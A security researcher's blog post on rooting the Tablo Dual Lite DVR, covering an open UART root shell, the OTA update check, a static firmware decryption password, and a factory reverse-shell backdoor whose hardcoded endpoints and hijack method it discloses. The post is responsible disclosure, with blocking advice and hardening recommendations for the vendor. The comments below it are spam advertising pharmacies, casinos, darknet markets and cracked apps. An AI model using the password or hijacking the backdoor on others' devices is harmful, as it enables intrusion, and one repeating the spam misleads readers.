Rooting the Tablo Dual Lite OTA DVR

128 Replies

Recently I had a Tablo Dual Lite OTA DVR appliance fall into my hands from a family member after its wireless started to act up. Doing what I do best, I decided to tear it apart and figure out how it works and in doing so found a few methods to gain root access into the stock firmware. One thing I did not expect to find, however, is an engineering backdoor that could be hijacked to provide an easy method for root access.

Teardown

Teardown of the device is quite straight forward. Remove the 4 rubber feet on the bottom, the screws under them, and then the top comes off. From there just continue to remove the 4 screws holding the PCB in, and remove the heatsink & RF shield to reveal the full PCB.

Additional photos can be found at https://imgur.com/a/M1el3wP

In good news, the header on the left (seen with a header already soldered) provides us with a UART interface. The pinout is as follows:

Specs

Overall this device has semi-decent hardware given its footprint, even if it’s a bit unique.

  • Pixelworks XCode 5516 (ARC) CPU
  • 2x Nanya Technology NT5CB128M16IP-EK DRAM (512MB total)
  • Kingston Technology EMMC08G-M325-X01U NAND (3.6GB total)
  • GigaDevice GD25Q16C SPI NOR (2MB)
  • 10/100 Ethernet
  • 1x USB 2.0 Controller

There’s some strange details in the specs, such as the RAM and NAND. For example, while the device has 512MB of RAM, only 122MB~ is allocated for Linux. This is seen in the boot log of the device.

[    0.000000] Memory: 122600K/524296K available (4529K kernel code, 131K rwdata, 696K rodata, 112K init, 234K bss, 401696K reserved)

It also seems that while the EMMC is an 8GB, it’s reporting only 3.6GB to U-Boot and the Linux kernel. I assume it’s somehow over-provisioned for wear leveling, but that is just an assumption that I can not validate.

An example boot log from the device can be found on GitHub Gist at https://gist.github.com/riptidewave93/90d4c048702489e24009f2ca76216db6

In the above boot log, you can see there is no type of signature check being done on the kernel or rootfs, which means with GPL source you could run your own firmware using the stock bootloader.

Root via UART

For some extra fun, when you wire into UART both U-Boot and the Firmware allow access without any password or restriction. Below you can find the UART output.

Hit any key to stop autoboot:  0 
Nuvyyo> 
Nuvyyo> printenv
hostname=gii
bootfile=uImage_gz_nuvyyo
loadaddr=0x3000000
bootdelay=1
bootdevice=0
autostart=yes
Board_ID=0x3201
ipaddr=192.168.1.254
serverip=192.168.1.202
gatewayip=192.168.1.1
netmask=255.255.255.0
ethact=eth0
ethaddr=XX:XX:XX:XX:XX:XX
eth0_reset_pin=4
current_active=0
bootcmd=mmc read 3000000 800 2000; bootm
bootargs=root=/dev/mmcblk0p4 rw rootwait
stdin=serial
stdout=serial
stderr=serial

Environment size: 396/2044 bytes
Nuvyyo>

As for the Firmware, wait for Linux to fully boot and you should be greeted with a root prompt. If your device has not been setup and isn’t wired via ethernet, you will need to wait for it to broadcast as an AP for setup, then press Ctrl-C on the CLI to drop into a root shell.

...
starting pid 813, tty '': '/tmp/slip/bin/nv_reset_poll'
starting pid 814, tty '': '/tmp/slip/bin/slip -d 4'
db_objects.cpp:159: SlipDB() DBUtil::SlipDB pid 814  this=0x221da4  now Sat Dec  3 17:15:56


# whoami
root
#

OTAs

The OTA check process is done by the main binary on the device, called slip. When OTA checks are done, a POST is done to the endpoint https://api.tablotv.com/assocserver/chkversion/ with a JSON payload that includes the mac address of your device (SID), as well as the current version number. You can do an example call to the OTA endpoint using a CURL call similar to below:

$ curl -X POST -d '{ "sid": "SID_5087B8000000", "version": { "major": 2, "minor": 2, "build": 42, "rc": 2225809 } }' -H "Content-Type: application/json"  https://api.tablotv.com/assocserver/chkversion/

{"success": true, "current": true}

If you change the build number to be older than the latest, you will get back a JSON payload response with a URL to download the latest OTA, as well as update notes. An example of this response can be found below:

{"success": true, "current": false, "update": {"version": {"major": 2, "minor": 2, "build": 42, "rc": 2225809}, "url": "http://imgsrv.tablotv.com/payloads/giv/2.2.42-2225809_giv.flash", "notes": "Release Notes for Tablo Firmware Update 2.2.42\r\n\r\n\u2022 Improvements for Tablo Connect setup via iOS and tvOS\r\n\u2022 Improvements to ensure subscription status retention in the event of back-end server outages\r\n\u2022 Bug fixes and performance improvements\r\n\r\nThe privacy policy regarding the device and viewing data your Tablo DVR shares with us has been updated. See www.tablotv.com/privacy for details.\r\n\r\nNOTE: Post-upgrade database processes (if needed) may take several minutes to complete. During this time the LED will be blinking. Do not power down the Tablo until the LED is solid again.", "name": "2.2.42-2225809_giv.flash", "size": 25740373, "date": "2022-09-15 14:32:14+00:00"}}

The actual OTA file itself, 2.2.42-2225809_giv.flash, is AES encrypted with AESCrypt. It can be decrypted using the static password that was found in /usr/bin/nv_swupgrade.

AesCrypt -o 2.2.42-2225809_gii.tar.gz -p Jet3144stream -d ./2.2.42-2225809_gii.flash
tar xvf 2.2.42-2225809_gii.tar.gz

Once extracted, you will have a copy of the rootfs, kernel, and u-boot binary you can inspect/go through.

Engineering Backdoor and how to hijack it

In my research I found that during startup an init script was failing, specifically /etc/init.d/S41rrs.

The contents of this file were kind of concerning, as it’s a script that starts up a tool called rrs, which is Reverse Remote Shell. In this script, there is a default IP/Port set, and a call out to an external tool to override this default.

...
IP=72.142.116.106
PORT=25001

...
start() {
...

        rrsq=`nv_rrsq`
        if [ $? -eq 0 ]; then
                IP=`echo ${rrsq} | nv_json -q ip`
                PORT=`echo ${rrsq} | nv_json -q port`
                fi

        /usr/sbin/rrs -Dq -R5 -t5 $IP $PORT
        echo "OK"
}
...

Notice the flags rrs is using, which based on the help info for rrs, means that it’s running as a daemon quietly, with an infinite reconnect attempt, 5 second timeout, direct to the IP and Port without any encryption or obfuscation!

I also took a peek at /home/default/bin/nv_rrsq, and it was found this service opens a socket to 3.93.161.222:5012 and would send a SID payload, similar to the OTA check. The socket will then reply with an IP and Port for the device to open a connection to. The best part is it’s all plain text, and there’s no encryption or obfuscation, just like rrs!

Back to /etc/init.d/S41rrs, thankfully it does not have the execute bit set by default, but in searching the file system it was found 2 different binaries have the ability to enable/start this service.

# grep -ra "S41rrs" /home
/home/default/bin/slip:chmod 0755 /etc/init.d/S41rrs
/home/default/bin/slip:/etc/init.d/S41rrs start
/home/default/bin/nv_reset_poll:pkill -x rrs; sh /etc/init.d/S41rrs start > /dev/null

Due to the complexity of the slip binary I have been unable to determine how it can be used to trigger rrs, but I assume it’s based on a message or command sent from Tablo directly. However, the nv_reset_poll is more interesting as this is the polling binary that watches the reset button on the device.

Because of this, with some Hairpin NAT configuration on your network, you can have a root shell opened up on the Tablo device by just pressing the reset button in a specific pattern!

I have released a tool with instructions at https://github.com/riptidewave93/tablo-rrs-hijack that can be used to gain a root shell.

Conclusion

Overall, this Tablo device is surprisingly open which is good for research. However, I have major concerns with the fact Engineering backdoors are being put into the consumer firmware for all devices. If you want to disable rrs from being able to be used, your best bet is to block the following IP/port combos.

  • 3.93.161.222:5012
  • 72.142.116.106:25001

Just note that blocking these will only work as of the latest firmware of 2.2.42-2225809, and at any point an OTA could be pushed out that changes these endpoints.

For Tablo/Nuvyyo

First off, thank you for providing such a unique appliance to the market. I know a few folks who use their Tablo daily and really appreciate how it’s subscription free and just works. As for the firmware stack, I have a few recommendations that I would like to see implemented to help harden the device:

  • OTA update downloads, even if AES encrypted, should not be done over HTTP. This can allow for MITM attacks if the structure of the OTA update is known (which it is).
  • PLEASE remove rrs completely from the production firmware image. If you need to troubleshoot a device in the field, push it a debug firmware via your OTA system. These types of backdoors should not be on every device!
  • Both rrs and nv_rrsq should NOT be doing plain text sockets. Both should be doing SOME type of encryption (ex, Twofish encryption for rrs, and SSL for nv_rrsq), or preferred, please see my previous recommendation of just removing them. PLEASE.
  • Maybe don’t use swap on an EMMC partition, as this is how you thrash your storage. ZRam is a good alternative for embedded devices like this.

128 thoughts on “Rooting the Tablo Dual Lite OTA DVR

  3. RobertTor

    При выборе SLAM-сканера возникла проблема: моделей много, у всех разная точность, дальность, скорость съёмки и качество построения облака точек, а по характеристикам сложно понять, как устройство поведёт себя в реальных условиях — в помещениях, тоннелях или на сложных объектах. Не хочется переплатить за лишние функции или получить данные с сильным шумом и ошибками привязки. На что в первую очередь смотреть при выборе SLAM-сканера: точность, стабильность алгоритма, дальность, автономность или качество софта для обработки? Как выбрать [url=https://www.tumblr.com/chaika9384/815316289419689984/%D1%81%D0%BA%D0%B0%D0%BD%D0%B5%D1%80%D1%8B?source=share]slam сканер[/url]

    Reply
  8. Bonniezek

    CANADIAN PHARMACIES MAIL ORDER [url=http://amoxicillinpharm.com/]buy amoxicillin without prescription uk[/url] Online Canadian Pharmacy.Cheap generic medications. [url=http://canadianapharcharmy.com/]Canadian Pharcharmy Online[/url] Healthy man reviews Buy Brand and Generic Viagra online At V-Medical (OVERNIGHT Shipping) [url=http://usaonlinepharmacywithoutaprescription.com/]online pharmacy with no prescription[/url] Canada – Wikipedia, the free encyclopedia [url=http://usaonlinepharmacywithoutaprescription.com/]United States pharmacy cialis[/url] CANDIAN PHARMACY SPECIAL OFFER : VIAGRA on SALE at $0.75 [url=http://canadianapharcharmy.com/]canadian pharmacy online no script[/url] CANADIAN PHARMACY THAT TAKES PAYPAL BUY Viagra online without prescription ::: >>> This drug is safe

    Reply
  10. Ermolai_Lobnya _net

    Народ, уже задолбался, что в официальной версии половина контента заблокирована. Весь инет перерыл, пока не наткнулся на нормальный взлом: https://android-apk-mods.ru/golovolomki/4880-skachat-vzlom-move-the-ball-correctly-mod-menyu-stabilnaya-versiya-apk-na-android.html . Вирусов нет, проверял на планшете и мобиле. Надеюсь, кому-то тоже поможет сэкономить.

    Reply
  11. Miguelbum

    При выборе SLAM-сканера возникла проблема: моделей много, у всех разная точность, дальность, скорость съёмки и качество построения облака точек, а по характеристикам сложно понять, как устройство поведёт себя в реальных условиях — в помещениях, тоннелях или на сложных объектах. Не хочется переплатить за лишние функции или получить данные с сильным шумом и ошибками привязки. На что в первую очередь смотреть при выборе SLAM-сканера: точность, стабильность алгоритма, дальность, автономность или качество софта для обработки? Как выбрать [url=https://chesskomi.borda.ru/?1-10-0-00000615-000-0-0-1777546114]slam сканер[/url]

    Reply
  12. RussiaTravelers.Alere

    Привет!
    Захожу сюда давно но обычно молчу. Тема близкая, промолчать не получилось. Могу поделиться как оно бывает: внутренние перелёты почти всегда выгоднее чем кажутся если брать заранее. Простая истина которую доходишь сам: первые день-два уходят просто на то чтобы понять как тут всё устроено.
    Спрашивай — отвечу из личного опыта.
    Ну и про [url=https://russiatravelers.ru/]путешествия по России[/url] думаю могу что-то рассказать.

    Reply
  14. ClaudiaMix

    [url=https://telegra.ph/%CE%91%CE%B9%CF%87%CE%BC%CE%AE-%CF%84%CE%BF%CF%85-%CE%B4%CF%8C%CF%81%CE%B1%CF%84%CE%BF%CF%82-%CE%B7-%CE%B2%CE%B9%CE%BF%CE%BB%CE%BF%CE%B3%CE%AF%CE%B1-%CE%95%CE%BE%CE%B5%CE%BB%CE%AF%CE%BE%CE%B5%CE%B9%CF%82-%CE%B9%CE%B1%CF%84%CF%81%CE%B9%CE%BA%CE%AD%CF%82-%CE%BA%CE%B1%CE%B9%CE%BD%CE%BF%CF%84%CE%BF%CE%BC%CE%AF%CE%B5%CF%82-%CE%BA%CE%B1%CE%B9-%CE%BF-%CE%BC%CE%B5%CF%84%CE%B1%CF%83%CF%87%CE%B7%CE%BC%CE%B1%CF%84%CE%B9%CF%83%CF%84%CE%B9%CE%BA%CF%8C%CF%82-%CF%81%CF%8C%CE%BB%CE%BF%CF%82-%CF%84%CF%89%CE%BD-Bio-%CE%9D-04-14]https://telegra.ph/Beyond-the-Headlines-Real-Time-Updates-Shaping-Online-Entertainment-News-04-14[/url]
    https://telegra.ph/Beyond-the-Headlines-Real-Time-Updates-Shaping-Online-Entertainment-News-04-14

    Reply
  16. ThomasGuego

    When you’re checking out numerous exchange providers, it’s helpful looking at this broker and its versions like iq-brokers or iq broker to discover which one works for your needs well. A lot of users suggest that reviewing IQ Broker VIP options offers some exclusive features valuable for exploring.

    Users can explore comprehensive data and user feedback on [url=https://iqbrokerfaq.com]iq_broker[/url] where the group reviews all aspects from iqbrokers to this platform trading experiences. It is always good to acquire as extensive research as feasible before deciding on your preference.

    Reply
  17. CharlesAromy

    When you’re investigating channels for direct video engagements, discovering the diverse parts of livejasmin can be really informative. Whether you’re looking at livejasmin_cams or the livejasmin_studio tools, all of them offers remarkable advantages for visitors and performers equally. For a full breakdown and some valuable pointers, see [url=https://livejustcams.com]livejasmin_studio[/url] for more info.

    In addition, livejasmin_video and livejasmin-stream features give reliable and top-notch streaming sessions that improve user engagement. It pays to exploring these capabilities to get the most out of your time on the page and embrace flawless live broadcasts.

    Reply
  28. sandiego-aviator.com_yx7

    dude check this out sandiego-aviator.com is actually pretty cool. like the design doesnt suck and u can find stuff without getting lost. not saying its perfect but def worth a look imo [url=https://deepai.org/profile/777bet]777bet[/url]

    Reply
  29. WalterSkila

    Столкнулся с вопросом выбора SLAM-сканера для обмеров и построения 3D-моделей: по описанию все устройства обещают быструю съемку, точное облако точек и удобную обработку, но без опыта сложно понять, какие характеристики действительно важны. Нужно, чтобы сканер не терял позиционирование, нормально работал в помещениях со сложной геометрией, давал стабильную точность и выгружал данные в удобных форматах. Вариантов много: разная дальность, скорость сканирования, автономность, качество ПО, вес и совместимость с рабочими программами. Кто сталкивался: как правильно выбрать SLAM-сканер и на что смотреть перед покупкой? Как выбрать [url=https://airlady.forum24.ru/?1-7-0-00006559-000-0-0-1777546037]slam сканер[/url]

    Reply
  37. Maximjg

    Big wins are within reach than you think. This slot paid out 1.2M yesterday. Grab free spins and play today! Start Spinning Here -> is.gd/g60Lbt

    Reply
  39. Davidirrift

    Volonteru.ru — проект про благотворительность и социальные инициативы. Здесь публикуются обзоры социальных проектов, а также материалы о современных интернет-технологиях.

    Официальный сайт проекта: https://volonteru.ru

    Сегодня интернет-аудитория активно интересуются запросами «кракен даркнет», а также «kraken onion». Авторы платформы советуют проверять источники информации.

    [url=https://volonteru.ru]как зайти на кракен[/url]

    На платформе Volonteru регулярно выходят статьи о цифровой грамотности, а также истории волонтеров. Пользователи, интересующиеся темами «кракен маркетплейс», часто встречают на опасные ресурсы.

    [url=https://volonteru.ru]кракен маркетплейс[/url]

    Авторы Volonteru.ru регулярно рассказывают о современных угрозах в интернете. В материалах проекта часто анализируются темы, связанные с мошенническими схемами, которые могут встречаться пользователям при поиске запросов «кракен ссылка».

    Интернет-технологии объединяют пользователей, но одновременно требуют внимательности.

    [url=https://volonteru.ru]гайд кракен[/url]

    На платформе сайте проекта также публикуются истории волонтеров. Проект рассказывает о помощи людям и одновременно объясняет принципы безопасного поведения в сети.

    Запросы про kraken onion продолжают обсуждаться, поэтому пользователям важно проверять источники.

    [url=https://volonteru.ru]Кракен даркнет[/url]

    В связи с этим специалисты платформы рекомендуют использовать только надежные источники информации. Команда проекта считает важным повышать цифровую грамотность пользователей и помогать развитию социальных инициатив.

    Volonteru.ru объединяет пользователей, интересующихся благотворительностью, а также публикует контент о цифровой безопасности.

    Reply
  41. JamesCof

    Si estas buscando activamente experiencias acuaticas en las Canarias, mas aun en la zona portuaria o este lugar, tomar en alquiler jet ski es una gran posibilidades mas increibles para experimentar del mar. Tienes a disposicion diversas modalidades de renta de motos acuaticas en esta parte de Tenerife con precios distintos, pensadas para personas nuevas como para quienes buscan recorridos mas atrevidas como los jet ski safari en el area de Costa Adeje.

    Igualmente, si te interesa unir la emocion con la descoberta, las experiencias en jet ski en la isla brindan paisajes magnificas y la alternativa de explorar la costa de una forma activa animada y placentera. Para recibir mas detalles sobre arrendamiento y aventuras en jet ski en esta zona, visita a este espacio [url=https://motosdeaguatenerife.top]alquiler motos de agua tenerife sur[/url] , donde encontraras como comparar tarifas y acceder a las mas recomendadas promociones.

    Reply
  42. Ronaldfrede

    Si estas buscas experiencias nauticas en el puerto de Colon Tenerife, conseguir motos de agua es una increible alternativa para explorar la zona costera y disfrutar del oceano de forma alegre y estimulante. En la zona sur de Tenerife, sobre todo en destinos como la zona de Los Gigantes, puedes encontrar desde alquileres directos hasta excursiones en moto de agua que estan adaptadas a cualquier nivel y presupuesto.

    Para todo aquel que buscan comparar tarifas y opciones, sugiero mirar servicios de negocios que disponen de servicios de alquiler en jetskis en Tenerife, ofreciendo tambien opciones como jet ski safari o reserva de jet skis en Santa Cruz y alrededores. Mas datos y datos sobre rutas y tarifas estan disponibles en este enlace: [url=https://motoaguatenerife.top]jet ski hire[/url] . ?Ideal para disfrutar de un dia distinto y gozar del entorno costero canario!

    Reply
  45. AaronGlump

    Вывод запоя в клинике Сочи: лечение алкогольной интоксикации, капельница, детоксикация, помощь нарколога на дому и в стационаре круглосуточно, анонимно
    Изучить вопрос глубже – [url=https://vivod-iz-zapoya-sochi22.ru/]врач вывод из запоя[/url]

    Reply
  49. Ігор wap

    Натрапив на огляд «Холодильні вітрини для м’яса: ТОП-7 моделей 2026 року за співвідношенням ціни та енергоефективності» на https://vybir.kiev.ua/ru/2026/06/chto-takoe-universalnaja-holodilnaja-vitrina-i-pochemu-ona-nuzhna-vashemu-magazinu .
    Було цікаво ознайомитися з рекомендаціями.
    Особливо сподобалося, що у статті наведено практичні приклади.
    Якраз шукав подібний матеріал.
    Рекомендую всім, хто працює у сфері торгівлі тим, хто цікавиться темою холодильних вітрин та вибором обладнання для магазину.

    Reply
  50. Stephenlof

    Si te encuentras evaluando una alternativa original de estadia, las burbujas en nuestro pais son una posibilidad cada vez mas demandada. Incluyendo noches burbuja Andalucia llegando a recintos burbuja en la zona catalana y la capital, estas propuestas permiten una conexion unica con la biodiversidad sin renunciar a la comodidad absoluta. Asimismo, sitios como Bardenas Reales y la suite burbuja Estrella Polar en Murcia se distinguen por su entorno natural unico y acabado moderno.

    Para quienes deseen quieren explorar tipos de experiencia burbuja cerca de Madrid, Catalunya o Alicante, hay multiples propuestas como casas burbuja, areas de camping burbuja y cabanas esfera. Puedes facilmente consultar amplia informacion util y precios actualizados sobre burbujas experience en multiples regiones a continuacion: [url=https://dormirburbuja.top]burbuja villena[/url] . Con toda certeza, es una propuesta inmejorable para escapar y deleitarse de escenarios maravillosas.

    Reply
  52. StuartSon

    Столкнулся с вопросом выбора SLAM-сканера для обмеров и построения 3D-моделей: по описанию все устройства обещают быструю съемку, точное облако точек и удобную обработку, но без опыта сложно понять, какие характеристики действительно важны. Нужно, чтобы сканер не терял позиционирование, нормально работал в помещениях со сложной геометрией, давал стабильную точность и выгружал данные в удобных форматах. Вариантов много: разная дальность, скорость сканирования, автономность, качество ПО, вес и совместимость с рабочими программами. Кто сталкивался: как правильно выбрать SLAM-сканер и на что смотреть перед покупкой? Как выбрать и где [url=https://www.tumblr.com/chaika9384/812043805328048128/slam-%D1%81%D0%BA%D0%B0%D0%BD%D0%B5%D1%80%D1%8B?source=share]купить slam сканер[/url]

    Reply
  75. baggageclaim

    Всем привет!
    Редко пишу на форумах. Тема близкая, промолчать не получилось. Из своего опыта скажу: внутренние перелёты почти всегда выгоднее чем кажутся если брать заранее. Главное что понял за много поездок: бронь жилья на месте — это лотерея, особенно в сезон.
    Пиши что интересует, попробую помочь.
    Если вы знаете что такое [url=https://russiatravelers.ru/directions/belokurikha-sanatorij/]Белокуриха[/url] – вы крутой!

    Reply
  77. DavidEmeva

    Добрый день, форумчане! Я специалист по SEO с опытом более 16 лет. В работе активно использую Xrumer и GSA SER для построения естественной ссылочной массы. Хочу поделиться проверенным источником баз ссылок: https://dseo24.monster

    Reply
  88. Lucas Martins

    Interesting teardown on Tablo hardware. I’m reading this as a tech/engineer angle that fits many beauty pros who rely on reliable, secure devices in their studios. In Suplery we focus on keeping beauty businesses streamlined and secure, with features like a single dashboard for suppliers and real-time stocktakes. If you’re managing inventory for a barbershop or a spa, this can cut chaos. Pro tip: the platform offers a shared cart for real-time order building, plus wholesale pricing that helps small salons scale. My take here: strong software governance matters as much as hardware hardening. Suplery can help you keep products authentic and delivery predictable, so you aren’t chasing firmware-style surprises. Consider trying Suplery to simplify supplier relations and protect your stock flow.

    Reply
  113. Claytonabses

    Столкнулся с вопросом выбора SLAM-сканера для обмеров и построения 3D-моделей: по описанию все устройства обещают быструю съемку, точное облако точек и удобную обработку, но без опыта сложно понять, какие характеристики действительно важны. Нужно, чтобы сканер не терял позиционирование, нормально работал в помещениях со сложной геометрией, давал стабильную точность и выгружал данные в удобных форматах. Вариантов много: разная дальность, скорость сканирования, автономность, качество ПО, вес и совместимость с рабочими программами. Кто сталкивался: как правильно выбрать SLAM-сканер и на что смотреть перед покупкой? Как выбрать и где [url=https://mymoscow.forum24.ru/?1-1-0-00003887-000-0-0-1777545800]купить slam сканер[/url]

    Reply
  118. \

    Всем привет!
    Редко пишу на форумах. Тема близкая, промолчать не получилось. Из своего опыта скажу: внутренние перелёты почти всегда выгоднее чем кажутся если брать заранее. Главное что понял за много поездок: бронь жилья на месте — это лотерея, особенно в сезон.
    Пиши что интересует, попробую помочь.
    Ну и про [url=https://russiatravelers.ru/]путешествия по России[/url] думаю могу что-то рассказать.

    Reply
  121. Michaelven

    Если вы планируете визит по наиболее живописным направлениям Чехии, точно стоит посетить в Прагу — этот замечательный город будто создан для знакомства за 1 день. В обзоре по Праге вы найдете путь по Праге на 1 день, охватывающий подобные точки как Петршинская башня, уникальная узкая улица в Праге и Вальдштейнский сад. Помимо этого не забудьте замок Хоуска и знаменитый Велька Америка — подлинный природный место в Чехии. Для полного плана и tips по ключевым точкам стоит посмотреть вот этот ресурс [url=https://pragagid-tur.ru]вальдштейнский сад[/url] .

    По поводу традиционного пива, обязательно попробуйте лучшие марки чешского пива, например, местные сорта из разных регионов и топ чешского пива с обзорами и описаниями. В Чехии это пиво — это настоящая культура, и стоит иметь представление, что из пива везти из Чехии в качестве отличного сувенира. Если стремитесь ознакомиться подробнее о типах чешского пива и пивных традициях, рекомендуется ознакомиться на эти известные чешские сорта пива и известные марки.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *